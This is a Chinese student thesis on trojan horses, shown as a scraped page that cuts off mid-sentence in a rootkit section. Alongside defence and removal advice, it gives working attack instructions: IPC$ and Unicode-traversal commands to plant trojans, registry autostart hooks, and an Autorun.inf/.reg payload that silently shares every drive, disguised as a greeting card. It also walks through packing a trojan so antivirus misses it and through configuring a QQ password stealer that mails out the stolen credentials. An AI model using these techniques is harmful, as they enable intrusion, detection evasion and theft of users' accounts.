木马攻击研究毕业论文毕业设计（论文）word格式

《木马攻击研究毕业论文毕业设计（论文）word格式》由会员分享，可在线阅读，更多相关《木马攻击研究毕业论文毕业设计（论文）word格式（28页珍藏版）》请在装配图网上搜索。

1、序言 早期的防病毒思想并不盛行，那时候的网民也比较单纯，使用网络防火墙的人也只有少数，所以那时候的入侵者可以算是幸福的，他们只需要一点简单的社会工程学手段就能把木马程序传输给对方执行，这一时期的木马种植手段（如今的普遍称谓为“下马”）基本上不需要牵涉到技术，也许唯一需要的技术就是如何配置和使用一个木马，因为那时候木马也还是个新产物而已。那时候的网民，只能依靠自己的判断和技术，才能免受或摆脱木马之害。因此，当木马技术刚在国内开始的时候，任意一个IP段都有可能存在超过40%的受害计算机开放着大门等待入侵者进攻，可以毫不夸张的说，那时候是木马的第一黄金时期，唯一美中不足的制约条件就是当时的网络速度普

2、遍太慢了。随着时间的流逝，木马技术发展日益成熟，但网民的安全意识也普遍提高，更出现了初期的病毒防火墙概念，这个时期的入侵者必须掌握更高级的社会工程学手段和初期的入侵技术才能让对方受害了，这时期的木马虽然隐蔽性有了相对提高，但仍然是基于客户端寻找连接服务器端的模式。由于出现了病毒防火墙，网民判断和查杀木马的效率大大提高，而且大部分人也知道“人心不古”了，不再轻易接收陌生人给的程序，使得木马不再像上时期那样肆无忌弹的横行，但是因为病毒防火墙是个新兴产物，仍然有相对多的人没有安装使用，以至于许多老旧的木马依然可以横行无忌。 再后来，随着网络防火墙技术诞生和病毒防火墙技术的成熟，木马作者被迫紧跟着防病

3、毒厂商的脚步更新他们的作品以避免马儿过早“殉职”，同时由于网络防火墙技术的出现，让计算机与网络之间不再直接，尤其是网络防火墙实现的“拦截外部数据连接请求”与“审核内部程序访问网络请求”的策略，导致大部分木马纷纷失效，这时期的木马逐渐分裂成两个派别：一种依然采用客户端连接服务器端的方式，只是改为了其他传输途径，如E-MAIL、FTP等，或者在内部除掉网络防火墙，以便自己畅通无阻；另一种则改变了入侵的思维，把“客户端连接服务器端”变为“服务器端连接客户端”，再加上一点社会工程学技术，从而突破了网络防火墙的限制，也因此诞生了一种新的木马技术“反弹型”木马。这一时期里，入侵者与受害者之间的战争终于提升

4、到技术级别，若想保护自己，除了安装网络防火墙和病毒防火墙，以及接触网络攻防技术以外别无他法，这个“基础互动”一直保持到今天的XP时代。到了XP时代，网络速度有了质的飞跃，黑客攻防战更是越来越多的浮上水面，因为系统变了，一个专门为网络应用而诞生的操作系统，必定会存在与网络有关的缺陷。没错，WinXP相对于Win9x的弱点就是它的网络漏洞太多了，无论是利用MIME漏洞传播的信件木马，还是通过LSASS溢出而放下的木马，都能在XP系统上分到一块肉。你也许会说，Win9x同样有许多漏洞，但是为什么它没有XP的烦恼？这是因为Win9x的网络功能太弱了，几乎没有什么系统组件需要依靠网络运行！所以现在的用户

5、，除了使用网络防火墙和病毒防火墙把自己包裹得严严实实以外，还要三天两头去微软的系统更新站点安装各种漏洞修复程序 特洛伊木马造成的危害可能是非常惊人的，由于它具有远程控制机器以及捕获屏幕、键击、音频、视频的能力，所以其危害程度要远远超过普通的病毒和蠕虫。深入了解特洛伊木马的运行原理，在此基础上采取正确的防卫措施，只有这样才能有效减少特洛伊木马带来的危害。木马攻击研究目录摘要.1 关键词.1第一章 木马概述1.1什么是木马.11.2 木马的危害.11.3 释放木马的常规方法.11.4 症状.2第二章 木马植入技术 2.1 木马的植入.4 2.2 了解木马的加载方式.5 2.3 木马的自动运行.5第

6、三章 木马的隐藏和伪装技术 3.1木马的伪装方式.63.2 常规伪装技术.7第四章 木马的攻击示例 4.1 入侵的方式.15 4.2 用自解压包入侵的方法.15 4.3 通过QQ木马入侵（例如盗取QQ号）.16 4.4 rootkit木马攻击原理.17第五章 木马的防范与清除 5.1 木马的清除.20 5.2 抵抗图片型木马的方法.20 5.3 木马万能查杀法.20第六章和 木马的种类同时与计算机病毒、蠕虫有什么区别6.1木马程序的种类.216.2计算机病毒、蠕虫有什么区别.23结 论.25致 谢.26参考文献.26摘要特洛伊木马（以下简称木马)，英文叫做“Trojan horse”，其名称取

7、自希腊神话的特洛伊木马记。 古希腊传说，特洛伊王子帕里斯访问希腊，诱走了王后海伦，希腊人因此远征特洛伊。围攻9年后，到第10年，希腊将领奥德修斯献了一计，就是把一批勇士埋伏在一匹巨大的木马腹内，放在城外后，佯作退兵。特洛伊人以为敌兵已退，就把木马作为战利品搬入城中。到了夜间，埋伏在木马中的勇士跳出来，打开了城门，希腊将士一拥而入攻下了城池。后来，人们在写文章时就常用“特洛伊木马”这一典故，用来比喻在敌方营垒里埋下伏兵里应外合的活动盗密报卡解绑过程关键词电脑，病毒，木马，计算机病毒，计算机安全第一章 木马概述1.1什么是木马“木马”一词，已不再是新名称；木马的流行，已不再是新鲜的事儿；但是木马的

8、危害，却始终是困扰众多使用者的根源；中了木马的计算机，可谓来无影，藏无踪； 轻则让用户计算机速度发生异常、网络速度变慢、甚至系统崩溃，重则往往让用户丢失游戏、银行帐户密码等等与个人息息相关的重要信息，不仅苦不堪言，还后悔莫及；种种恶果，种种恶行，种种懊悔，不仅木马传播者应承担一定责任，就连个人而言，或多或少也应该负点小小的责任；不良事件的发生，皆由我们太不了解木马所致；本文，旨在谈一下木马相关知识和研究，希望对阁下有所帮助！木马”程序是目前比较流行的病毒文件，与一般的病毒不同，它不会自我繁殖，也并不“刻意”地去感染其他文件，它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种者电脑的门户

9、，使施种者可以任意毁坏、窃取被种者的文件，甚至远程操控被种者的电脑。“木马”与计算机网络中常常要用到的远程控制软件有些相似，但由于远程控制软件是“善意”的控制，因此通常不具有隐蔽性；“木马”则完全相反，木马要达到的是“偷窃”性的远程控制，如果没有很强的隐蔽性的话，那就是“毫无价值”的。 一个完整的“木马”程序包含了两部分：“服务器”和“控制器”。植入被种者电脑的是“服务器”部分，而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。1.2 木马的危害相信木马对于大家来说不算陌生。它是一种远程控制工具，以简便、易行、有效而深受广大黑客青睐。一台电脑一旦中上木马，它就变成了一台傀儡机，对方

10、可以在你的电脑上上传下载文件，偷窥你的私人文件，偷取你的各种密码及口令信息中了木马你的一切秘密都将暴露在别人面前，隐私？不复存在！ （木马在黑客入侵中也是一种不可缺少的工具。就在去年的10月28日，一个黑客入侵了美国微软的门户网站，而网站的一些内部信息则是被一种叫做QAZ的木马传出去的。就是这小小的QAZ让庞大的微软丢尽了颜面！） （大家比较熟悉的木马当数国产软件冰河了。冰河是由黄鑫开发的免费软件，冰河面世后，以它简单的操作方法和强大的控制能力令人胆寒，可以说是达到了谈“冰”色变的地步。）1.3 释放木马的常规方法(1)传播方式: 木马的传播方式主要有两种:一种是通过E-MAIL,控制端将木马

11、程序以附件的形式夹在邮件中发送出 去, 收信人只要打开附件系统就会感染木马;另一种是软件下载，一些非正规的网站以提供软件下载为名义， 将木马捆绑在软件安装程序上，下载后，只要一运行这些程序，木马就会自动安装。(2)伪装方式: 鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这 是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目的。1.4 症状(1)修改图标 当你在E-MAIL的附件中看到这个图标时,是否会认为这是个文本文件呢?但是我不得不告 诉你,这也有可能是个木马程序,现在 已经有木马可以将木马服务端程序的图标改

12、成HTML,TXT, ZIP等各种文件的图标,这有相当大的迷惑性,但是目前提供这种功能的木马还不多见,并且这种伪装也不是无懈可击的,所以不必整天提心吊胆,疑神疑鬼的。 (2)捆绑文件 这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的情况下,偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(EXE,COM一类的文件)。 (3)出错显示 有一定木马知识的人都知道,如果打开一个文件,没有任何反应,这很可能就是个木马程序, 木马的设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错显示的功能。当服务 端用户打开木马程序时,会弹出一个如下图所示的错误提示框(这当然

13、是假的),错误内容可自由 定义,大多会定制成一些诸如“文件已破坏，无法打开的！”之类的信息，当服务端用户信以为真时,木马却悄悄侵入了 系统。 (4)定制端口 很多老式的木马端口都是固定的,这给判断是否感染了木马带来了方便,只要查一下特定的 端口就 知道感染了什么木马,所以现在很多新式的木马都加入了定制端口的功能,控制端用户可 以在1024-65535之间任选一个端口作为木马端口(一般不选1024以下的端口)，这样就给判断 所感染木马类型带来了麻烦。 (5)自我销毁 这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后，木马 会将自己拷贝到WINDOWS的系统文件夹中(C:

14、WINDOWS或C:WINDOWSSYSTEM目录下)，一般来说原木马文件 和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外),那么中了木马的朋友只要在近来 收到的信件和下载的软件中找到原木马文件,然后根据原木马的大小去系统文件夹找相同大小的文件, 判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木马后，原木马文件将自动销毁，这样服务端用户就很难找到木马的来源，在没有查杀木马的工 具帮助下，就很难删除木马了。 (6)木马更名 安装到系统文件夹中的木马的文件名一般是固定的，那么只要根据一些查杀木马的文章,按 图索骥在系统文件夹查找特定的文件,就可以断定中了什么木马。所以现在有很

15、多木马都允许控 制端用户自由定制安装后的木马文件名，这样很难判断所感染的木马类型了。第二章 木马植入技术2.1 木马的植入通过网上邻居(即共享入侵)要求:对方打开139端口且有共享的可写目录.用法:直接将木马放入即可.通过IPC$要求:双方均需打开IPC$且需要有对方的一个普通用户的帐号(具有写权限)用法:先用NET命令连上对方电脑 net use IPIPC$ 密码 /user:用户名再用COPY命令将木马复制到对方电脑net copy本地木马路径 远程木马路径+木马名字 通过网页植入要求:对方IE需要是IE未打补丁版本用法1:利用IE的IFRAME漏洞入侵.用法2:利用IE的DEBUG代码

16、入侵.用法3:通过JS,VBS代码入侵用法4:通过ActiveX或Java程序入侵.通过OE入侵.要求:对方OE未打补丁.用法:与中的用法1,3,4相同.通过WORD/EXCEL/ACCESS入侵要求:对方未对宏的运行做限制.用法:编写恶意的宏，夹杂木马，一运行office文档便植入主机中.用法2:通过OFFICE的帮助文件漏洞入侵.通过Unicode漏洞入侵要求:对方有Unicode漏洞用法(举例): _blankhttp:/x.x.x.x/scripts/.%c1%1c./winnt/system32/cmd.exe?+COPY+本地木马路径+远程路径+木马名通过FTP入侵要求:对方的FT

17、P可以匿名登陆而且可写入用法:直接将木马传上去即可.通过TELNET入侵要求:具有对方的一个具有写权限的帐号用法:用TELNET命令将木马传上去.EXE合并木马要求:无(但用于合并木马的EXE文件体积应该尽量小,而且应该是比较熟悉的程序.)用法:用EXE文件合并器将两个EXE合并即可.winrar木马入侵要求:对方安装了Winrar用法:将压缩包设置为自解压格式,并设置自动运行的选项，再将RAR图标更改.文件夹惯性点击法要求:无用法:将一个木马伪装成文件夹的图标，再将其放于几层目录中.2.2 了解木马的加载方式加载方式：定位于System.ini和Win.ini文件System.ini(位置C

18、:windows)boot项原始值配置：“shell=explorer.exe”，explorer.exe是Windows的核心文件之一，每次系统启动时，都会自动加载。boot项修改后配置：“shell=explorer C:windowsxxx.exe”(xxx.exe假设一木马程序)。Win.ini(位置C:windows) windows项原始值配置：“load=”；“run=”，一般情况下，等号后无启动加载项。windows项修改后配置：“load=”和“run=”后跟非系统、应用启动文件，而是一些你不熟悉的文件名。解决办法：执行“运行msconfig”命令，将System.ini文件

19、和Win.ini文件中被修改的值改回原值，并将原木马程序删除。若不能进入系统，则在进入系统前按“Shift+F5”进入Command Prompt Only方式，分别键入命令edit system.ini和edit win.ini进行修改。加载方式：隐藏在注册表中(此方式最为隐蔽)。注意以下注册表项：HKEY LOCAL MACHINESoftwareclassesexefileshellopencommand原始数值数据：%1%被修改后的数值数据：C:systemxxx.exe %1%原注册表项是运行可执行文件的格式，被修改后就变为每次运行可执行文件时都会先运行C:systemxxx.exe

20、这个程序。例如：开机后运行QQ主程序时，该xxx.exe(木马程序)就先被加载了。解决办法：当通过防火墙得知某端口被监听，立即下线，检查注册表及系统文件是否被修改，找到木马程序，将其删除。所谓“病从口入”感染源还是在于加载了木马程序的服务器端。目前，伪装可执行文件图标的方法很多，如：修改扩展名，将文件图标改为文件夹的图标等，并隐藏扩展名，因此接收邮件和下载软件时一定要小心。许多木马程序的文件名很像系统文件名，造成用户对其没有把握，不敢随意删除，因此要不断增长自己的知识才可防备万一。2.3 木马的自动运行由自启动激活木马 自启动木马的条件,大致出现在下面6个地方: 1.注册表:打开HKEY_LO

21、CAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下的五个以Run 和RunServices主键,在其中寻找可能是启动木马的键值。 2.WIN.INI:C:WINDOWS目录下有一个配置文件win.ini，用文本方式打开，在windows字段中有启动 命令 load=和run=,在一般情况下是空白的,如果有启动程序,可能是木马。 3.SYSTEM.INI:C:WINDOWS目录下有个配置文件system.ini，用文本方式打开，在386Enh,mci， drivers32中有命令行,在其中寻找木马的启动命令。 4.Autoexec.bat和Con

22、fig.sys:在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都 需要控制端用户与服务端建立连接后，将已添加木马启动命令的同名 文件上传 到服务端覆盖这两个文件才行。 5.*.INI:即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马 启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。 6.启动菜单:在“开始-程序-启动”选项下也可能有木马的触发条件。 由触发式激活木马 1.注册表:打开HKEY_CLASSES_ROOT文件类型shellopencommand主键,查看其键值。举个例子,国产 木马“冰河”就是修改HKEY_

23、CLASSES_ROOT xtfileshellopencommand下的键值,将“C :WINDOWS NOTEPAD.EXE %1”该为“C:WINDOWSSYSTEMSYXXXPLR.EXE %1”，这时你双 击一个TXT文件 后，原本应用NOTEPAD打开文件的，现在却变成启动木马程序了。还要说明 的是不光是TXT文件 ，通过修改HTML，EXE，ZIP等文件的启动命令的键值都可以启动木马 ，不同之处只在于“文件类型”这个主键的差别，TXT是txtfile,ZIP是WINZIP，大家可以 试着去找一下。 2.捆绑文件:实现这种触发条件首先要控制端和服务端已通过木马建立连接，然后控制端用

24、户用工具 软件将木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖原文件，这样即使 木马被删 除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。 3.自动播放式:自动播放本是用于光盘的，当插入一个电影光盘到光驱时，系统会自动播放里面的内容，这就是自动播放的本意，播放什么是由光盘中的AutoRun.inf文件指定的，修改AutoRun.inf中的open一行可以指定在自动播放过程中运行的程序。后来有人用于了硬盘与U盘，在U盘或硬盘的分区，创建Autorun.inf文件，并在Open中指定木马程序，这样，当你打开硬盘分区或U盘时，就会触发木马程序的运行。木马作者还在不断寻找“可乘之机”

25、这里只是举例，又有不断的自启动的地方被挖掘出来。第三章 木马的隐藏和伪装技术3.1木马的伪装方式鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目的。 (一)修改图标 当你在E-MAIL的附件中看到这个图标时,是否会认为这是个文本文件呢?但是我不得不告 诉你,这也有可能是个木马程序,现在 已经有木马可以将木马服务端程序的图标改成HTML,TXT, ZIP等各种文件的图标,这有相当大的迷 惑性,但是目前提供这种功能的木马还不多见,并且这种 伪装也不是无懈可击的,所以不

26、必整天提心吊胆,疑神疑鬼的。 (二)捆绑文件 这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的 情况下 ,偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(即EXE,COM一类的文件)。 (三)出错显示 有一定木马知识的人都知道,如果打开一个文件,没有任何反应,这很可能就是个木马程序, 木马的 设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错显示的功能。当服务 端用户打开木 马程序时,会弹出一个如下图所示的错误提示框(这当然是假的),错误内容可自由 定义,大多会定制成 一些诸如“文件已破坏，无法打开的！”之类的信息，当服务端用户信以 为真时,木马却悄

27、悄侵入了 系统。 (四)定制端口 很多老式的木马端口都是固定的,这给判断是否感染了木马带来了方便,只要查一下特定的 端口就 知道感染了什么木马,所以现在很多新式的木马都加入了定制端口的功能,控制端用户可 以在1024-65535之间任选一个端口作为木马端口(一般不选1024以下的端口)，这样就给判断 所感染木马类型带 来了麻烦。 (五)自我销毁 这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后，木马 会将自己拷贝到WINDOWS的系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下)，一般来说 原木马文件 和系统文件夹中的木马文件的大小是一样的(捆绑

28、文件的木马除外),那么中了木马 的朋友只要在近来 收到的信件和下载的软件中找到原木马文件,然后根据原木马的大小去系统 文件夹找相同大小的文件, 判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木 马后，原木马文件将自动销毁，这 样服务端用户就很难找到木马的来源，在没有查杀木马的工 具帮助下，就很难删除木马了。 (六)木马更名 安装到系统文件夹中的木马的文件名一般是固定的，那么只要根据一些查杀木马的文章,按 图索骥在系统文件夹查找特定的文件,就可以断定中了什么木马。所以现在有很多木马都允许控 制端用户自由定制安装后的木马文件名，这样很难判断所感染的木马类型了。 3.2最新伪装技术有什么办

29、法可以为木马掩去锋芒，避过杀毒软件的查杀呢？当然还是手动加壳！不过我们不会再用ASPACK或是UPX这些加壳软件，因为它们是最常用的，但同时也是失效最快的，所以我们要用一些另类不常见的加壳软件来为木马加壳，让最新的杀毒软件都无法识别出木马来。下面就跟我来挑战杀毒软件，品尝自己加密木马的过程吧。一、 幻影加壳，可障法眼二、 “幻影”加壳软件是一个为 Windows 下的EXE,DLL,OCX.32位可运行文件加密系统。软件下载地址是：三、 图1小提示：侦测木马原来是否加过壳并进行脱壳，可以使用Peid、UPX、Aspack之类的软件，至于如何操作，在这里就不作过多的叙述了，以前的网友世界里已经介

30、绍过很多了。运行幻影可以看到软件使用界面很简单，在“加密程序”中浏览选择刚才的“TheefServer.exe”文件，然后点击工具栏上的“加密”按钮（如图2），幻影就开始先对木马端备份，将原来的文件更名为“TheefServer.exe_bak”，然后再进行程序压缩加密，很快就完成了加壳工作。图2现在我们再用杀毒软件检测一下新生成的“TheefServer.exe”文件，可以看到杀毒软件已经无法检测发出病毒报警了。木马已经顺利骗过了杀毒软件（如图3）。怎么样，很简单的就让杀毒软件失效了吧？图3二、YC保护专家，为木马提供保护“YC保护专家”也是一个程序保护工具，是防止软件被Softice等工具

31、调试破解的，用它来为木马加壳，也有违开发者本意，不过顾不了那么多了，看看它对木马的保护是多强的吧？还是以刚才的“TheefServer.exe”木马文件为例，运行YC保护专家，浏览选择木马客户端，在保护选项中勾选如下几个选项“如果修改资源则损坏或退出”、“删除PE文件头”、“删除引入信息”，其中最关键的是后两项（如图4）。设置完毕后点击“保护”按钮，很快木马文件头信息就发生了改变，其中的病毒特征码也自然发生变化，而杀毒软件也无法识别出新生成的木马文件了。图4三、杀毒软件不识老外WWWPack32是一个国外的压缩加壳工具，采用的加壳方式与一般软件有所不同，因此用WWWPack32加过壳的木马很难

32、被杀毒软件识别出来，并且我们可以自己设定压缩加壳的等级。运行WWWPack32后，首先选择需加壳的木马执行文件，在“Mask”中选择“PE Structure（EXE and DLL）”（如图5），然后点击工具栏上的“Setup”按钮，弹出压缩设置窗口，在“Commpression Method”中可设置压缩等级（如图6）。当然压缩的等级越高，花的时间越多，不过被杀毒软件查出的几率也越小。退出设置框，点击工具栏上的“Fileinfo”按钮，可以查看到木马程序中可被压缩的数据信息，以及在压缩后体积的变化（如图7）。图5图6图7一切设置完毕后，点击工具栏上的“Pack”按钮，即可对木马进行压缩加壳

33、了，加过壳的木马同样不会被杀毒软件轻易识别出来。四、 病毒免疫器，让谁免疫？五、 “应用程序病毒免疫器”是一个特殊的程序保护工具，它本来是用来为程序加上一个病毒免疫头，保护程序不被病毒感染破坏的。不过笔者尝试用它来为木马病毒压缩加了个壳，却发现它对木马好像更是“保护关爱”，经它压缩过的木马居然不会被杀毒软件识别出来。运行程序后界面如图8所示，点击“系统设置”可对软件做一些设置，不过这里我们是用它保护木马，所以这些设置不做反而好些。点击下一步，在这里选择要加壳保护的木马程序，并设置处理方式为“普通用户方式”即可（如图9）。点击下一步，设置程序为自动修复（如图10）；在下一步可以设置一些程序修复时

34、的提示信息，最后点击下一步完成木马程序的保护过程（如图11）。图8图9图10图11经过以上的操作，一般的杀毒软件已无法准确判断出木马来，同时木马本身也具备了对杀毒软件的免疫功能。当特殊情况下，杀毒软件发现了木马并对其隔离时，会破坏其文件头数据，不过由于木马具备了自身恢复的功能，所以杀毒软件的隔离将对其失效，木马依然还是可以运行的。第四章 木马的攻击示例 4.1 入侵的方式木马被激活后，进入内存，并开启事先定义的木马端口，准备与控制端建立连接。这时服务端用 户可以在MS-DOS方式下，键入NETSTAT -AN查看端口状态，一般个人电脑在脱机状态下是不会有端口 开放的，如果有端口开放，你就要注意

35、是否感染木马了。下面是电脑感染木马后，用NETSTAT命令查 看端口的两个实例： 其中是服务端与控制端建立连接时的显示状态，是服务端与控制端还未建立连接时的显示状态。 在上网过程中要下载软件，发送信件，网上聊天等必然打开一些端口，下面是一些常用的端口： (1)1-1024之间的端口：这些端口叫保留端口，是专给一些对外通讯的程序用的，如FTP使用21， SMTP使用25，POP3使用110等。只有很少木马会用保留端口作为木马端口 的。 (2)1025以上的连续端口：在上网浏览网站时，浏览器会打开多个连续的端口下载文字，图片到本地 硬盘上，这些端口都是1025以上的连续端口。 (3)4000端口：

36、这是OICQ的通讯端口。 (4)6667端口：这是IRC的通讯端口。 除上述的端口基本可以排除在外，如发现还有其它端口打开，尤其是数值比较大的端口，那就要怀疑 是否感染了木马，当然如果木马有定制端口的功能，那任何端口都有可能是木马端口。4.2 用自解压包入侵的方法如果捆绑一个木马给别人，只要稍有常识的人有杀毒软件就可以识破。如果不用木马，用些批处理炸弹、碎片对象文件、或自导入注册表文件，就可以实现各种攻击。 把以下两行保存为Autorun.infAutorunopen=regedit /s Autorun.reg把以下一段保存为Autorun.regREGEDIT4HKEY_LOCAL_MAC

37、HINESoftwareMicrosoftWindowsCurrentVersionNetworkLanmanc$Path=c:Remark=Type=dword:00000000Flags=dword:00000192Parm1enc=hex:Parm2enc=hex:HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanmanD$Path=D:Remark=Type=dword:00000000Flags=dword:00000192Parm1enc=hex:Parm2enc=hex:HKEY_LOCAL_MAC

38、HINESoftwareMicrosoftWindowsCurrentVersionNetworkLanmanE$Path=E:Remark=Type=dword:00000000Flags=dword:00000192Parm1enc=hex:Parm2enc=hex:HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanmanF$Path=F:Remark=Type=dword:00000000Flags=dword:00000192Parm1enc=hex:Parm2enc=hex: 比如在当今电子贺卡漫天飞的

39、时代，可以把你的自解压包命名为“牛年贺卡”，包里包个真贺卡，顺便把以上两个文件打包进去，注意要指定文件解包路径。当收贺卡人点击自解压包时真贺卡被解压的同时，两个文件就悄悄的被解到指定位置。Autorun.inf必须解到某一分区的根目录，名字不能变，可以设置文件隐藏属性。Autorun.reg文件名和释放目录可以任意，可以更好的隐藏，注意Autorun.inf指向目录正确的地方。当受害人双击有Autorun.inf的分区时，他的硬盘C、D、E、F分区就被打开公享。4.3 通过QQ木马入侵（例如盗取QQ号）很多朋友都有过QQ号被盗的经历，即使用“密码保护”功能找回来后，里面的Q币也已经被盗号者洗劫

40、一空，碰到更恶毒的盗号者，还会将你的好友统统删除，朋友们将会永远得离开你。想过反击吗？什么，反击？别开玩笑了，我们只是菜鸟，不是黑客，我们只会看看网页，聊聊天，连QQ号是怎么被盗的都不知道，还能把盗号者怎么样呢？其实喜欢盗号的所谓“黑客”们，也只是利用了一些现成的盗号工具，只要我们了解了QQ号被盗的过程，就能作出相应防范，甚至由守转攻，给盗号者以致命一击。 一、知己知彼，盗号技术不再神秘 如今，还在持续更新的QQ盗号软件已经所剩无几，其中最为著名，流传最广的则非“啊拉QQ大盗”莫属，目前绝大多数的QQ号被盗事件都是由这个软件引起的。软件的使用条件很简单，只要你有一个支持smtp发信的邮箱或者一

41、个支持asp脚本的网页空间即可。而且该木马可以将盗取的QQ号自动分为靓号和非靓号两种，并将它们分别发送到不同的信箱中，这也是“啊拉QQ大盗”如此流行的原因之一。接下来，便让我们先来了解一下其工作原理，以便从中找到反击的良方。 1、选择盗号模式 下载“啊拉QQ大盗”，解压后有两个文件：alaqq.exe、爱永恒，爱保姆qq.asp.其中alaqq.exe是“啊拉QQ大盗”的配置程序，爱永恒，爱保姆qq.asp是使用“网站收信”模式时需使用的文件。正式使用之前，还需要设置其参数。 “邮箱收信”配置：运行alaqq.exe，出现程序的配置界面。在“发信模式选择”选项中选中“邮箱收信”，在“邮箱收信”

42、填写电子邮箱地址（建议使用程序默认的网易的邮箱）。这里以邮箱n12345（密码n_12345）为例来介绍“邮箱收信”模式时的配置，并进行下文中的测试。此外，在“收信箱（靓）”和“收信箱（普）”中可以填入不同的邮箱地址用来接受QQ靓号和普通QQ号。然后在“发信服务器”下拉框中选择自己邮箱相应的smtp服务器，这里是.最后填入发信箱的帐号、密码、全称即可。 设置完毕后，我们可以来测试一下填写的内容是否正确，点击下方“测试邮箱”按钮，程序将会出现邮箱测试状态。如果测试的项目都显示成功，即可完成邮箱信息配置。 “网站收信”配置：除了选择“邮箱收信”模式之外，我们还可以选择“网站收信”模式，让盗取的QQ

43、号码自动上传到指定的网站空间。当然，在使用之前，也需要做一些准备工作。 用FTP软件将爱永恒，爱保姆qq.asp上传支持ASP脚本的空间，运行alaqq.exe，在“Asp接口地址”中输入爱永恒，爱保姆qq.asp所在的URL地址，那么，当木马截获QQ号码信息后，就会将其保存于爱永恒，爱保姆qq.asp同目录下的qq.txt文件中。 2、设置木马附加参数 接下来我们进行高级设置。如果勾选“运行后关闭QQ”，对方一旦运行“啊拉QQ大盗”生成的木马，QQ将会在60秒后自动关闭，当对方再次登录QQ后，其QQ号码和密码会被木马所截获，并发送到盗号者的邮箱或网站空间中。此外，如果希望该木马被用于网吧环境

44、，那就需要勾选“还原精灵自动转存”，以便系统重起后仍能运行木马。除这两项外，其他保持默认即可。 3、盗取QQ号码信息 配置完“啊拉QQ大盗”，点击程序界面中的“生成木马”，即可生成一个能盗取QQ号码的木马程序。我们可以将该程序伪装成图片、小游戏，或者和其他软件捆绑后进行传播。当有人运行相应的文件后，木马会隐藏到系统中，当系统中有QQ登录时，木马便会开始工作，将相关的号码及密码截取，并按照此前的设置，将这些信息发送到邮箱或者网站空间。4.4 rootkit木马攻击原理在我们获得了对目标的控制权后，还想保持这种控制权限，于是就出现了木马后门，Rootkit之类的保护权限的手段。首先来说一下我们常见

45、的应用层次的木马后门，比如我们常见的远程控制类的软件，像国外的Sub7,VNC,netbus,国内的冰河，灰鸽子，黑洞等等，这些大家都很熟悉因此就不详细介绍了。然而此类后门的可以很容易被发现，现在的杀毒软件大多都能轻松的查处，即使暂时查不到，用其他手段检测也不是很困难,现在就我就给大家介绍一种比一般木马后门潜伏的更深的一类木马后门-Rootkit。 传统的Rootkit是一种比普通木马后门更为阴险的木马后门。它主要通过替换系统文件来达到目的。这样就会更加的隐蔽，使检测变得比较困难。传统的Rootkit对一系列平台均有效，但主要是针对Unix的，比如Linux,AIX,SunOs等操作系统。当然

46、有些Rootkits可以通过替换DLL文件或更改系统来攻击windows平台.Rootkit并不能让你直接获得权限，相反它是在你通过各种方法获得权限后才能使用的一种保护权限的措施，在我们获取系统根权限(根权限即root权限，是Unix系统的最高权限)以后,Rootkits提供了一套工具用来建立后门和隐藏行迹，从而让攻击者保住权限。 下面就针对Unix来讲解一下传统Rootkit的攻击原理 RootKits是如何实现后门的呢?为了理解Rootkits后门，有必要先了解一下Unix的基本工作流程，当我们访问Unix时(不管是本地还是远程登陆)，/bin/login程序都会运行，系统将通过/bin/

47、login来收集并核对用户的帐号和密码.Rootkits使用一个带有根权限后门密码的/bin/login来替换系统的/bin/login,这样攻击者输入根权限后门的密码，就能进入系统。就算管理员更改了原来的系统密码或者把密码清空。我们仍能够 使用后门密码以根用户身份登陆。在攻入Unix系统后，入侵者通常会进行一系列的攻击动作，如安装嗅探器收集重要数据，而Unix中也会有些系统文件会监视这些动作，比如ifconfig等，Rootkit当然不会束手就擒，它会同样替换一下这些系统文件， 通常被Rootkit替换的系统程序有login,ifconfig,du,find,ls,netstart,ps等。

48、由于篇幅问题，这些系统文件的功能就不一一罗列，有兴趣的读者可以自己去查找，现在Rootkit的工具很多，里面基本都是包含一些处理过的系统文件来代替原来的系统文件的，像tOmkit等一些Rootkit就是比较优秀的了。 防御办法:Rootkit如此可怕，得好好防它才行，实际上，防御他的最有效的方法时定期的对重要系统文件的完整性进行核查，这类的工具很多，像Tripwire就是一个非常不错的文件完整性检查工具。一但发现遭受到Rootkit攻击，那你就比较麻烦了，你必须完全重装所有的系统文件部件和程序，以确保安全性. 写到这里，战争似乎结束了，然而更可怕的Rootkit还没登场，那就是更加恐怖(这个词

49、一点也不夸张)的内核级Rootkit。在大多数操作系统中(各种Unix和windows)，内核是操作系统最基本的部件，它控制着对网络设备、进程、系统内存、磁盘等的访问。例如当你打开一个文件时，打开文件的请求被发送到内核，内核负责从磁盘得到文件的比特位并运行你的文件浏览程序。内核级Rootkit使攻击者获得对系统底层的完全控制权。攻击者可以修改你的内核，大多数内核级Rootkit都能进行执行重定向，即截获运行某一程序的命令，将其重定向到入侵者所选中的程序并运行此程序。也就是说用户或管理员要运行程序A，被修改过的内核假装执行A,实际却执行了程序B.现在就介绍一下内核级的Rootkit是如何攻击Un

